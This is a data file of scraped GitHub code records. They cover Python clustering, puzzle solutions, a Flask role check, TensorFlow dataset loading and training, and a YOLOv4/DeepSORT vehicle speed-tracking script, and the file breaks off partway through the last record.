+{"seq_id":"13151104928","text":"from copy import deepcopy\nimport numpy as np\n\n\ndef link(sim, f):\n \"\"\"Using single or complete-linkage (determined by f), builds a tree\n of clusters. Each index of the array tree is one level of the\n tree, where we can find multiple clusters.\n\n Takes the similarity matrix and objective function as inputs.\n\n \"\"\"\n tree = [{}]\n for x in range(len(sim) - 1):\n max_ij = np.unravel_index(np.nanargmax(sim), (len(sim), len(sim)))\n keep = min(max_ij)\n throw = max(max_ij)\n for i in range(len(sim)):\n if keep != i and throw != i:\n sim[keep, i] = f(sim[keep, i], sim[throw, i])\n sim[i, keep] = f(sim[i, keep], sim[i, throw])\n if throw != i:\n sim[throw, i] = np.NINF\n sim[i, throw] = np.NINF\n\n # Procedure to iteratively build the tree\n before = tree[len(tree) - 1]\n tree.append(deepcopy(before))\n now = tree[len(tree) - 1]\n if keep in now and throw in now:\n now[keep].extend(now[throw])\n now[keep].append(throw)\n now.pop(throw)\n elif keep in now:\n now[keep].append(throw)\n elif throw in now:\n now[keep] = [throw]\n now[keep].extend(now[throw])\n now.pop(throw)\n else:\n now[keep] = [throw]\n\n return tree\n","repo_name":"carlosgeos/in-da-hood","sub_path":"src/link.py","file_name":"link.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23626330831","text":"import sys, itertools\r\n\r\ndef write_p(o, p):\r\n\tfor i in p:\r\n\t\tfor j in i:\r\n\t\t\to.write(j)\r\n\t\to.write('\\n')\r\n\t\t\r\ndef no_blue(p, num_rows, num_cols):\r\n\tfor i in range(0, num_rows):\r\n\t\tfor j in range(0, num_cols):\r\n\t\t\tif p[i][j] == '#':\r\n\t\t\t\treturn False\r\n\treturn True\r\n\t\t\r\ndef blue_check(p, num_rows, num_cols):\r\n\treturn True\r\n\tfor i in range(0, num_rows):\r\n\t\tfor j in range(0, num_cols):\r\n\t\t\tif i < num_rows - 1 and j < num_cols - 1:\r\n\t\t\t\ta = p[i+0][j+0] == '#'\r\n\t\t\t\tb = p[i+1][j+0] == '#'\r\n\t\t\t\tc = p[i+0][j+1] == '#' \r\n\t\t\t\td = p[i+1][j+1] == '#'\r\n\t\t\t\taa = a and b and c and d\r\n\t\t\t\tbb = a == False and b == False and c == False and d == False\r\n\t\t\t\tif not aa or bb:\r\n\t\t\t\t\treturn False\r\n\treturn True\r\n\t\t\r\n\r\n\r\nfilename = sys.argv[1]\r\nf = open(filename)\r\no = open(filename + \".out\", \"wt\")\r\nnum_tests = int(f.readline())\r\nfor t in range(1, num_tests+1):\r\n\to.write(\"Case #%d:\\n\" % t)\r\n\r\n\tnum_rows, num_cols = [int(x) for x in f.readline().split()]\r\n\tp = []\r\n\ttotal = 0\r\n\twhite = 0\r\n\tblue = 0\r\n\tfor r in range(0,num_rows):\r\n\t\tc = f.readline().strip()\r\n\t\ttotal += len(c)\r\n\t\tfor x in c:\r\n\t\t\tif x == '.': white += 1\r\n\t\t\tif x == '#': blue += 1\r\n\t\tp.append([x for x in c])\r\n\t#print p\r\n\t\r\n\t# check for easy cases\r\n\tif white == total:\r\n\t\twrite_p(o,p)\r\n\telif blue % 4 != 0:\r\n\t\to.write(\"Impossible\\n\")\r\n\telse:\r\n\t\tfor i in range(0, num_rows):\r\n\t\t\tfor j in range(0, num_cols):\r\n\t\t\t\tblue_block = i < num_rows - 1 and j < num_cols -1 and p[i+0][j+0] == '#' and p[i+1][j+0] == '#' and p[i+0][j+1] == '#' and p[i+1][j+1] == '#'\r\n\t\t\t\tif blue_block:\r\n\t\t\t\t\tp[i+0][j+0] = '/'\r\n\t\t\t\t\tp[i+1][j+0] = '\\\\'\r\n\t\t\t\t\tp[i+0][j+1] = '\\\\'\r\n\t\t\t\t\tp[i+1][j+1] = '/'\r\n\t\tif no_blue(p, num_rows, num_cols):\r\n\t\t\twrite_p(o,p)\r\n\t\telse:\r\n\t\t\to.write(\"Impossible\\n\")\r\n\t\r\n\t#o.write(\"Case #%d: %s\\n\" % (t, res))\r\no.close()\r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_84/198.py","file_name":"198.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"9829613979","text":"from flask import Blueprint\nfrom flask_login import current_user, login_required\n\nstudent = Blueprint('student', __name__)\n\n@student.before_request\n# @login_required\ndef before_request():\n if \"student\" != current_user.roles[0].role_name:\n return \"Unauthorized Access \"\n \n@student.route(\"/stud-home\")\n@login_required\ndef home():\n return \"Student Homepage \"\n ","repo_name":"naveeng2402/flask_role_based_auth_test","sub_path":"website/routes/student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"74332137475","text":"import main\nimport model\nimport preprocessing\nimport callbacks as my_callbacks\n\nimport numpy as np\nfrom pathlib import Path\nimport tensorflow as tf\nfrom tensorflow import keras\n\nimport sys\n\ndef prerun(args, meta, data):\n split = args[\"split_dir\"]\n aug = preprocessing.apply_augmentation if args[\"augmentation\"] else None\n\n with tf.device(\"/cpu:0\"): \n train_ds, val_ds, train_len, validation_len = preprocessing.load_datasets(\n Path(split, \"train.txt\"), Path(split, \"val.txt\"), meta, args, aug, data=data\n )\n\n return train_ds, val_ds, train_len, validation_len\n\ndef run(args, meta, model, callbacks, exp, id_=100, data=None):\n train_ds, val_ds, train_len, validation_len = prerun(args, meta, data)\n \n init_weights_path = Path(args[\"run_dir\"], 'initial_model_weights.h5')\n if init_weights_path.exists():\n model.load_weights(str(init_weights_path))\n \n if not init_weights_path.exists():\n hist = model.fit(train_ds,epochs=1,steps_per_epoch=1)\n model.save_weights(str(init_weights_path))\n \n for i, cb in enumerate(callbacks):\n if type(cb)==my_callbacks.ValidationMonitor:\n cb.set(val_ds, validation_len, id_, exp)\n if type(cb)==my_callbacks.ImageLogger:\n cb.set_dataset(train_ds, len(args[\"channels\"]))\n\n hist = model.fit(\n train_ds,\n epochs=args[\"epochs\"], \n steps_per_epoch=int(np.ceil(train_len/args[\"batch_size\"])),\n callbacks=callbacks,\n validation_data=val_ds,\n validation_steps=int(np.ceil(validation_len/args[\"batch_size\"]))\n )\n \n return hist\n","repo_name":"saeyslab/DeepLearning_for_ImagingFlowCytometry","sub_path":"functions/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"61"}
+{"seq_id":"5349510507","text":"# 调整霍夫圆环检测参数\n# trackbar参数范围待调整,否则会导致cv2.HoughCircles参数错误\n\nfrom __future__ import print_function\nimport cv2 as cv\nimport cv2 as cv2\nimport argparse\n\n\nmin_value = 1\nmax_value = 200\n\nminDist = 10\nparam1 = 10\nparam2 = 10\nminRadius = 10\nmaxRadius = 20\n\n\nparam1_name = 'minDist'\nparam2_name = 'param1'\nparam3_name = 'param2'\nparam4_name = 'minRadius'\nparam5_name = 'maxRadius'\n\ndef on_param1_thresh_trackbar(val):\n global minDist\n minDist = max(val, 0)\n cv.setTrackbarPos(param1_name, window_trackbar_name, minDist)\n\ndef on_param2_thresh_trackbar(val):\n global param1\n param1 = max(val, 0)\n cv.setTrackbarPos(param2_name, window_trackbar_name, param1)\n\ndef on_param3_thresh_trackbar(val):\n global param2\n param2 = max(val, 0)\n cv.setTrackbarPos(param3_name, window_trackbar_name, param2)\n\ndef on_param4_thresh_trackbar(val):\n global minRadius\n global maxRadius\n minRadius = val\n minRadius = min(maxRadius-1, minRadius)\n cv.setTrackbarPos(param4_name, window_trackbar_name, minRadius)\n\ndef on_param5_thresh_trackbar(val):\n global minRadius\n global maxRadius\n maxRadius = val\n maxRadius = max(maxRadius, minRadius+1)\n cv.setTrackbarPos(param5_name, window_trackbar_name, maxRadius)\n\nparser = argparse.ArgumentParser(description='Code for Thresholding Operations using inRange tutorial.')\nparser.add_argument('--camera', help='Camera devide number.', default=0, type=int)\nargs = parser.parse_args()\n\ncap = cv.VideoCapture(args.camera)\n\nwindow_trackbar_name = \"Params\"\ncv.namedWindow(window_trackbar_name)\ncv.createTrackbar(param1_name, window_trackbar_name, min_value, max_value, on_param1_thresh_trackbar)\ncv.createTrackbar(param2_name, window_trackbar_name, min_value, max_value, on_param2_thresh_trackbar)\ncv.createTrackbar(param3_name, window_trackbar_name, min_value, max_value, on_param3_thresh_trackbar)\ncv.createTrackbar(param4_name, window_trackbar_name, min_value, max_value, on_param4_thresh_trackbar)\ncv.createTrackbar(param5_name, window_trackbar_name, min_value, max_value, on_param5_thresh_trackbar)\n\nwhile True:\n ## [while]\n ret, frame = cap.read()\n if frame is None:\n break\n\n ret, img = cap.read()\n # cv2.imshow('1',img)\n #降噪(模糊处理用来减少瑕疵点)\n # result = cv2.blur(img, (5,5))\n # cv2.imshow('2',result)\n #灰度化,就是去色(类似老式照片)\n gray=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n # cv2.imshow('3',gray)\n \n #param1的具体实现,用于边缘检测 \n # canny = cv2.Canny(img, 40, 80) \n # cv2.imshow('4', canny) \n \n #霍夫变换圆检测\n a,b,c,d,e = minDist, param1, param2, minRadius, maxRadius\n # circles= cv2.HoughCircles(gray,cv2.HOUGH_GRADIENT,1,10,param1=40,param2=20,minRadius=15,maxRadius=20)\n # cv2.HoughCircles(image, method, dp, minDist, circles=None, param1=None, param2=None, minRadius=None, maxRadius=None)\n circles= cv2.HoughCircles(gray,cv2.HOUGH_GRADIENT,1,a,param1=b,param2=c,minRadius=d,maxRadius=e)\n #输出返回值,方便查看类型\n print(circles)\n if type(circles) == None.__class__:\n continue\n\n #输出检测到圆的个数\n print(len(circles[0]))\n \n #根据检测到圆的信息,画出每一个圆\n for circle in circles[0]:\n #圆的基本信息\n print(circle[2])\n #坐标行列(就是圆心)\n x=int(circle[0])\n y=int(circle[1])\n #半径\n r=int(circle[2])\n #在原图用指定颜色圈出圆,参数设定为int所以圈画存在误差\n img=cv2.circle(img,(x,y),r,(0,0,255),1,8,0)\n #显示新图像\n cv2.imshow('Result',img)\n \n key = cv.waitKey(30)\n if key == ord('q') or key == 27:\n break\n\ncv2.destroyAllWindows()\n \n\n\n\n\n\n","repo_name":"leebinjun/cchess-brobot","sub_path":"vision/classify/01_circle_params.py","file_name":"01_circle_params.py","file_ext":"py","file_size_in_byte":3808,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
+{"seq_id":"73138194753","text":"import pickle\n\nimport cv2\nimport tensorflow as tf\nimport os\nfrom datasets.dataset import Dataset\nfrom tf_records_parser.cifar10 import LOCAL_FOLDER\nimport numpy as np\nimport json\nimport re\n\n\nIMAGE_SHAPE = [128, 128, 1]\nfolder_records = \"tf_records_quickdraw\"\n\ndef parse_function(example_proto):\n features = {\"image_raw\": tf.FixedLenFeature((), tf.string),\n \"label\": tf.FixedLenFeature((), tf.int64),\n \"index\": tf.FixedLenFeature((), tf.string)\n }\n parsed_features = tf.parse_single_example(example_proto, features)\n\n flat_image = tf.decode_raw(parsed_features[\"image_raw\"], tf.uint8)\n reconst = tf.cast(tf.transpose(tf.reshape(flat_image, tf.stack([1, 128, 128])), [1, 2, 0], 'reconstructed_image'),tf.float32)\n\n return parsed_features[\"index\"], reconst, parsed_features[\"label\"]\n\n\ndef get_n_classes():\n class_map = os.path.join(LOCAL_FOLDER, folder_records, \"labelnames.json\")\n with open(class_map, 'r') as f:\n names_data = json.load(f)\n return len(names_data)\ndef get_records_folder():\n return os.path.join(LOCAL_FOLDER, folder_records)\n\n\ndef list_records():\n path_records = get_records_folder()\n\n # list all tfrecords\n tfrecords = list(map(lambda x: os.path.join(path_records, x), sorted(filter(\n lambda name: name.split('.')[-1] == 'tfrecord',\n os.listdir(path_records)))))\n return tfrecords\n\n\nclass QuickDraw_Dataset(Dataset):\n\n def __init__(self, epochs, batch_size, data_folder=None, **kwargs):\n tfrecords = list_records()\n n_records = len(tfrecords)\n self.n_classes = get_n_classes()\n print(\"Loaded {0} classes\".format(self.n_classes))\n\n if data_folder:\n self.data_folder = data_folder\n\n # load class_name -> label map\n class_map = os.path.join(self.data_folder,\"labelnames.json\")\n with open(class_map,'r') as f:\n names_data=json.load(f)\n self.class_name_map = {names_data[label].split('.')[0] : label for label in names_data}\n\n\n tfrecords.sort(key=lambda x: int(re.search('.+_(\\d+).tfrecord', x).group(1)))\n train_records = [tfrecords[i] for i in [7,0,1,2,8,13,14,19,20]]\n validation_records = [tfrecords[i] for i in [5]] # ,3,4,5,11,15\n test_records = [tfrecords[i] for i in [6]] # ,12,16\n #\n #,9,10,17,18\n\n #.cache('temp/dataset_cached_qd_tr.cache')\n #.cache('temp/dataset_cached_qd_val.cache')\n #.cache('temp/dataset_cached_qd_test.cache')\n\n train_n_records,val_n_records,test_n_records = len(train_records),len(validation_records),len(test_records)\n print(\"Train records : {0} , Val records: {1} , Test records {2}\".format(train_n_records,len(validation_records),len(test_records)))\n #assert (train_n_records + val_n_records + test_n_records == n_records), \"The train-val-test split must use all tf records.\"\n\n\n\n dataset_train = tf.data.TFRecordDataset(train_records).map(parse_function)\n dataset_val = tf.data.TFRecordDataset(validation_records).map(parse_function)\n dataset_test = tf.data.TFRecordDataset(test_records).map(parse_function)\n\n # Calculate mean image, std image\n mean_image_path = os.path.join(LOCAL_FOLDER, 'mean_quickdraw.npy')\n train_index_list_path = os.path.join(LOCAL_FOLDER, 'train_list_quickdraw.pkl')\n train_labels = os.path.join(LOCAL_FOLDER, 'labels_quickdraw.pkl')\n\n if not os.path.exists(mean_image_path):\n sess = tf.get_default_session()\n temp_iterator = dataset_train.batch(10).make_one_shot_iterator().get_next()\n p_mean = np.zeros(IMAGE_SHAPE)\n c = 0\n train_index_list=[]\n all_labels = []\n\n try:\n while True:\n index, batch_x, batch_y = sess.run(temp_iterator)\n p_mean = p_mean + np.mean(batch_x, axis=0) # IMAGE_SHAPE\n c += 1\n train_index_list += index.tolist()\n all_labels += batch_y.tolist()\n except tf.errors.OutOfRangeError:\n self.mean = (p_mean / c).astype(np.float32)\n self.train_index_list = train_index_list\n np.save(mean_image_path, self.mean)\n with open(train_index_list_path,'wb') as f:\n pickle.dump(train_index_list,f,-1)\n\n\n\n with open(train_labels, 'wb') as f:\n dict_labels = {ind : lbl for (ind,lbl) in zip(train_index_list,all_labels)}\n pickle.dump(dict_labels, f, -1)\n print(\"Saved mean image\")\n print(\"Saved train index list\")\n else:\n print(\"Mean image loaded from file\")\n print(\"Train index list loaded from file\")\n self.mean = np.load(mean_image_path)\n with open(train_index_list_path,'rb') as f:\n self.train_index_list = pickle.load(f)\n\n with open(train_labels,'rb') as f:\n self.label_dict = pickle.load(f)\n self.label_dict = {k.decode('utf8') : self.label_dict[k] for k in self.label_dict}\n\n\n self.train_index_list = list(map(lambda x : x.decode('utf8'),self.train_index_list)) #each string was a byte array\n\n def preprocess(index, x, y):\n return (index, tf.add(x, -self.mean) / 255, tf.one_hot(y, self.n_classes))\n\n\n # preprocesss\n # shuffle_buffer = int(self.n_classes*1000*0.8)\n self.train_dataset = dataset_train.map(preprocess).repeat(epochs).batch(batch_size)\n self.valid_dataset = dataset_val.map(preprocess).repeat(1).batch(batch_size)\n self.dataset_test = dataset_test.map(preprocess).repeat(1).batch(batch_size)\n\n # Create iterator\n iterator = self.iterator = tf.data.Iterator.from_structure(self.train_dataset.output_types,\n self.train_dataset.output_shapes)\n\n # check parameters\n super().__init__(**kwargs)\n\n def preprocess_batch(self, image_batch):\n \"\"\"\n Process a new batch substract train_mean.\n :return:\n \"\"\"\n\n return (image_batch - self.mean) / 255\n\n def inverse_preprocess(self, image_batch):\n return (image_batch * 255) + self.mean\n\n @property\n def shape(self):\n return IMAGE_SHAPE\n\n @property\n def shape_target(self):\n return [self.n_classes]\n\n def get_index_list(self):\n assert (hasattr(self, 'data_folder')), \"Image folder undefined\"\n return self.train_index_list\n\n def get_train_image_at(self, index,strict=False): # index is image path\n # example: n02423022_7746.JPEG\n # n02423022_original_images\n assert (hasattr(self, 'data_folder')), \"Image folder undefined\"\n if not(index in self.train_index_list):\n print(\"WARNING IMAGE NOT IN TRAIN LIST YOU ARE USING A TEST OR VALIDATION IMAGE\")\n if strict:\n print(\"Strict mode returning NONE\")\n return None\n inverse_class_name = {int(self.class_name_map[k]) : k for k in self.class_name_map}\n class_name = inverse_class_name[self.label_dict[index]]\n full_path = os.path.join(self.data_folder,class_name, \"{0}_{1}.png\".format(class_name,index))\n img = cv2.imread(full_path,cv2.IMREAD_GRAYSCALE)\n s = self.vis_shape()\n img_out = cv2.resize(img, tuple(s[0:2])) # original image need resize\n\n return img_out.reshape(1, s[0], s[1], 1), [self.class_name_map[class_name]]\n\n def get_data_range(self):\n return [0, 255]\n\n def vis_shape(self):\n return [128,128]\n\n\nif __name__ == '__main__':\n with tf.Session().as_default() as sess:\n t = QuickDraw_Dataset(1, 10,data_folder='./temp/quickdraw_expanded_images')\n","repo_name":"aferral/mejora_clasificador_feedback_CAM","sub_path":"datasets/quickdraw_dataset.py","file_name":"quickdraw_dataset.py","file_ext":"py","file_size_in_byte":7860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"40285724037","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 7 22:27:38 2017\n\n@author: yc\n\"\"\"\n\nclass Solution(object):\n def findLengthOfLCIS(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n c = []\n count = 0\n i = 0\n while(i 0:\r\n tf.config.experimental.set_memory_growth(physical_devices[0], True)\r\nfrom absl import app, flags, logging\r\nfrom absl.flags import FLAGS\r\nimport core.utils as utils\r\nfrom core.yolov4 import filter_boxes\r\nfrom tensorflow.python.saved_model import tag_constants\r\nfrom core.config import cfg\r\nfrom PIL import Image\r\nimport cv2\r\nimport math\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom tensorflow.compat.v1 import ConfigProto\r\nfrom tensorflow.compat.v1 import InteractiveSession\r\n# deep sort imports\r\nfrom deep_sort import preprocessing, nn_matching\r\nfrom deep_sort.detection import Detection\r\nfrom deep_sort.tracker import Tracker\r\nfrom tools import generate_detections as gdet\r\nfrom speed_calculation import speed_estimation_module\r\n\r\nflags.DEFINE_string('framework', 'tf', '(tf, tflite, trt')\r\nflags.DEFINE_string('weights', './checkpoints/yolov4-416',\r\n 'path to weights file')\r\nflags.DEFINE_integer('size', 416, 'resize images to')\r\nflags.DEFINE_boolean('tiny', False, 'yolo or yolo-tiny')\r\nflags.DEFINE_string('model', 'yolov4', 'yolov3 or yolov4')\r\nflags.DEFINE_string('video', './data/video/video_01.mp4', 'path to input video or set to 0 for webcam')\r\nflags.DEFINE_string('output', './outputs/demo_01.avi', 'path to output video')\r\nflags.DEFINE_string('output_format', 'XVID', 'codec used in VideoWriter when saving video to file')\r\nflags.DEFINE_float('iou', 0.45, 'iou threshold')\r\nflags.DEFINE_float('score', 0.50, 'score threshold')\r\nflags.DEFINE_boolean('dont_show', False, 'dont show video output')\r\nflags.DEFINE_boolean('info', False, 'show detailed info of tracked objects')\r\nflags.DEFINE_boolean('count', False, 'count objects being tracked on screen')\r\nflags.DEFINE_boolean('mask', True, 'do you want to have mask')\r\nflags.DEFINE_string('mask_path', './data/mask1.png', 'path to mask image')\r\n\r\n\r\ndef four_point_transform(image, rect):\r\n # obtain a consistent order of the points and unpack them\r\n \r\n\r\n # individually\r\n # rect = order_points(pts)\r\n (tl, tr, br, bl) = rect\r\n # compute the width of the new image, which will be the\r\n # maximum distance between bottom-right and bottom-left\r\n # x-coordiates or the top-right and top-left x-coordinates\r\n widthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\r\n widthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\r\n maxWidth_l = max(int(widthA), int(widthB))\r\n # compute the height of the new image, which will be the\r\n # maximum distance between the top-right and bottom-right\r\n # y-coordinates or the top-left and bottom-left y-coordinates\r\n heightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\r\n heightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\r\n maxHeight_l = max(int(heightA), int(heightB))\r\n \r\n\r\n \r\n # # The resultant image\r\n # cv2.imwrite('new_masked_image.png', masked_image)\r\n # crop_img = image[tl[0]:tl[0]+h, x:x+w]\r\n # now that we have the dimensions of the new image, construct\r\n # the set of destination points to obtain a \"birds eye view\",\r\n # (i.e. top-down view) of the image, again specifying points\r\n # in the top-left, top-right, bottom-right, and bottom-left\r\n # order\r\n dst = np.array([\r\n [0, 0],\r\n [maxWidth_l - 1, 0],\r\n \r\n [0, maxHeight_l - 1],[maxWidth_l - 1, maxHeight_l - 1]], dtype = \"float32\")\r\n # compute the perspective transform matrix and then apply it\r\n warped_M = cv2.getPerspectiveTransform(rect, dst)\r\n \r\n # return the warped image\r\n return warped_M, maxWidth_l, maxHeight_l\r\n# import the necessary packages\r\n\r\ndef order_points(pts):\r\n # initialzie a list of coordinates that will be ordered\r\n # such that the first entry in the list is the top-left,\r\n # the second entry is the top-right, the third is the\r\n # bottom-right, and the fourth is the bottom-left\r\n rect = np.zeros((4, 2), dtype = \"float32\")\r\n # the top-left point will have the smallest sum, whereas\r\n # the bottom-right point will have the largest sum\r\n s = pts.sum(axis = 1)\r\n rect[0] = pts[np.argmin(s)]\r\n rect[2] = pts[np.argmax(s)]\r\n # now, compute the difference between the points, the\r\n # top-right point will have the smallest difference,\r\n # whereas the bottom-left will have the largest difference\r\n diff = np.diff(pts, axis = 1)\r\n rect[1] = pts[np.argmin(diff)]\r\n rect[3] = pts[np.argmax(diff)]\r\n # return the ordered coordinates\r\n return rect\r\n\r\n\r\n\r\n\r\n# =============================================================================\r\n# [(73, 239), (356, 117), (475, 265), (187, 443)]\r\n# [(511, 214), (629, 203), (968, 593), (1278, 550)]\r\n# [(240, 218), (490, 215), (251, 537), (902, 579)]\r\n# [(218,240), (215,490), ( 537,251), (579,902)]\r\n# [(491, 212), (952, 598)]\r\n# =============================================================================\r\n# =============================================================================\r\n# Define ROIs\r\n# =============================================================================\r\n# right_plane = [(511, 214), (629, 203), (968, 593), (1278, 550)]\r\nright_plane = [(455, 184), (656, 178), (968, 593), (1275, 493)]\r\nleft_plane = [(240, 218), (490, 215), (251, 537), (902, 579)]\r\n\r\n# right_plane1 = [(511, 214), (629, 203), (1278, 550), (968, 593)]\r\nright_plane1 = [(455, 184), (656, 178), (1275, 493), (968, 593)]\r\nleft_plane1 = [(240, 218), (490, 215), (902, 579),(251, 537) ]\r\n\r\n\r\nline = [(491, 212), (952, 598)]\r\n\r\n# =============================================================================\r\n# cars_list: 0 1 2 3 4 5 6 7 8 9 \r\n# trackid start_height start_width end_h start-w time speed\r\n# =============================================================================\r\n\r\n\r\ndef main(_argv):\r\n # Definition of the parameters\r\n cars_list = np.zeros((1000,7))\r\n max_cosine_distance = 0.4\r\n nn_budget = None\r\n nms_max_overlap = 1.0\r\n \r\n # initialize deep sort\r\n model_filename = 'model_data/mars-small128.pb'\r\n encoder = gdet.create_box_encoder(model_filename, batch_size=1)\r\n # calculate cosine distance metric\r\n metric = nn_matching.NearestNeighborDistanceMetric(\"cosine\", max_cosine_distance, nn_budget)\r\n # initialize tracker\r\n tracker = Tracker(metric)\r\n\r\n # load configuration for object detector\r\n config = ConfigProto()\r\n config.gpu_options.allow_growth = True\r\n session = InteractiveSession(config=config)\r\n STRIDES, ANCHORS, NUM_CLASS, XYSCALE = utils.load_config(FLAGS)\r\n input_size = FLAGS.size\r\n video_path = FLAGS.video\r\n if FLAGS.mask:\r\n mask = cv2.imread(FLAGS.mask_path)//255\r\n\r\n # load tflite model if flag is set\r\n if FLAGS.framework == 'tflite':\r\n interpreter = tf.lite.Interpreter(model_path=FLAGS.weights)\r\n interpreter.allocate_tensors()\r\n input_details = interpreter.get_input_details()\r\n output_details = interpreter.get_output_details()\r\n print(input_details)\r\n print(output_details)\r\n # otherwise load standard tensorflow saved model\r\n else:\r\n saved_model_loaded = tf.saved_model.load(FLAGS.weights, tags=[tag_constants.SERVING])\r\n infer = saved_model_loaded.signatures['serving_default']\r\n\r\n # begin video capture\r\n try:\r\n vid = cv2.VideoCapture(int(video_path))\r\n except:\r\n vid = cv2.VideoCapture(video_path)\r\n fps_a = vid.get(cv2.CAP_PROP_FPS)\r\n\r\n out = None\r\n\r\n # get video ready to save locally if flag is set\r\n if FLAGS.output:\r\n # by default VideoCapture returns float instead of int\r\n width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))\r\n height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))\r\n fps = int(vid.get(cv2.CAP_PROP_FPS))\r\n codec = cv2.VideoWriter_fourcc(*FLAGS.output_format)\r\n out = cv2.VideoWriter(FLAGS.output, codec, fps, (width, height))\r\n\r\n frame_num = 0\r\n # while video is running\r\n pts_l = np.array(left_plane, dtype = \"float32\")\r\n pts_r = np.array(right_plane, dtype = \"float32\")\r\n # apply the four point tranform to obtain a \"birds eye view\" of\r\n # the image\r\n \r\n while True:\r\n return_value, frame = vid.read()\r\n warped_Mat_l, maxWidth_l, maxHeight_l = four_point_transform(frame, pts_l)\r\n warped_Mat_r, maxWidth_r, maxHeight_r = four_point_transform(frame, pts_r)\r\n # frame = frame*mask\r\n if return_value:\r\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\r\n image = Image.fromarray(frame)\r\n else:\r\n print('Video has ended or failed, try a different video format!')\r\n break\r\n frame_num +=1\r\n print('Frame #: ', frame_num)\r\n frame_size = frame.shape[:2]\r\n image_data = cv2.resize(frame, (input_size, input_size))\r\n image_data = image_data / 255.\r\n image_data = image_data[np.newaxis, ...].astype(np.float32)\r\n start_time = time.time()\r\n\r\n # run detections on tflite if flag is set\r\n if FLAGS.framework == 'tflite':\r\n interpreter.set_tensor(input_details[0]['index'], image_data)\r\n interpreter.invoke()\r\n pred = [interpreter.get_tensor(output_details[i]['index']) for i in range(len(output_details))]\r\n # run detections using yolov3 if flag is set\r\n if FLAGS.model == 'yolov3' and FLAGS.tiny == True:\r\n boxes, pred_conf = filter_boxes(pred[1], pred[0], score_threshold=0.25,\r\n input_shape=tf.constant([input_size, input_size]))\r\n else:\r\n boxes, pred_conf = filter_boxes(pred[0], pred[1], score_threshold=0.25,\r\n input_shape=tf.constant([input_size, input_size]))\r\n else:\r\n batch_data = tf.constant(image_data)\r\n pred_bbox = infer(batch_data)\r\n for key, value in pred_bbox.items():\r\n boxes = value[:, :, 0:4]\r\n pred_conf = value[:, :, 4:]\r\n\r\n boxes, scores, classes, valid_detections = tf.image.combined_non_max_suppression(\r\n boxes=tf.reshape(boxes, (tf.shape(boxes)[0], -1, 1, 4)),\r\n scores=tf.reshape(\r\n pred_conf, (tf.shape(pred_conf)[0], -1, tf.shape(pred_conf)[-1])),\r\n max_output_size_per_class=50,\r\n max_total_size=50,\r\n iou_threshold=FLAGS.iou,\r\n score_threshold=FLAGS.score\r\n )\r\n\r\n # convert data to numpy arrays and slice out unused elements\r\n num_objects = valid_detections.numpy()[0]\r\n bboxes = boxes.numpy()[0]\r\n bboxes = bboxes[0:int(num_objects)]\r\n scores = scores.numpy()[0]\r\n scores = scores[0:int(num_objects)]\r\n classes = classes.numpy()[0]\r\n classes = classes[0:int(num_objects)]\r\n\r\n # format bounding boxes from normalized ymin, xmin, ymax, xmax ---> xmin, ymin, width, height\r\n original_h, original_w, _ = frame.shape\r\n bboxes = utils.format_boxes(bboxes, original_h, original_w)\r\n\r\n # store all predictions in one parameter for simplicity when calling functions\r\n pred_bbox = [bboxes, scores, classes, num_objects]\r\n\r\n # read in all class names from config\r\n class_names = utils.read_class_names(cfg.YOLO.CLASSES)\r\n\r\n # by default allow all classes in .names file\r\n #allowed_classes = list(class_names.values())\r\n \r\n # custom allowed classes (uncomment line below to customize tracker for only people)\r\n allowed_classes = ['car','bus', 'truck']\r\n\r\n # loop through objects and use class index to get class name, allow only classes in allowed_classes list\r\n names = []\r\n deleted_indx = []\r\n for i in range(num_objects):\r\n class_indx = int(classes[i])\r\n class_name = class_names[class_indx]\r\n if class_name not in allowed_classes:\r\n deleted_indx.append(i)\r\n else:\r\n names.append(class_name)\r\n names = np.array(names)\r\n count = len(names)\r\n if FLAGS.count:\r\n cv2.putText(frame, \"Objects being tracked: {}\".format(count), (5, 35), cv2.FONT_HERSHEY_COMPLEX_SMALL, 2, (0, 255, 0), 2)\r\n print(\"Objects being tracked: {}\".format(count))\r\n # delete detections that are not in allowed_classes\r\n bboxes = np.delete(bboxes, deleted_indx, axis=0)\r\n scores = np.delete(scores, deleted_indx, axis=0)\r\n\r\n # encode yolo detections and feed to tracker\r\n features = encoder(frame, bboxes)\r\n detections = [Detection(bbox, score, class_name, feature) for bbox, score, class_name, feature in zip(bboxes, scores, names, features)]\r\n\r\n #initialize color map\r\n cmap = plt.get_cmap('tab20b')\r\n colors = [cmap(i)[:3] for i in np.linspace(0, 1, 20)]\r\n\r\n # run non-maxima supression\r\n boxs = np.array([d.tlwh for d in detections])\r\n scores = np.array([d.confidence for d in detections])\r\n classes = np.array([d.class_name for d in detections])\r\n indices = preprocessing.non_max_suppression(boxs, classes, nms_max_overlap, scores)\r\n detections = [detections[i] for i in indices] \r\n\r\n # Call the tracker\r\n tracker.predict()\r\n tracker.update(detections)\r\n \r\n # update tracks\r\n for track in tracker.tracks:\r\n if not track.is_confirmed() or 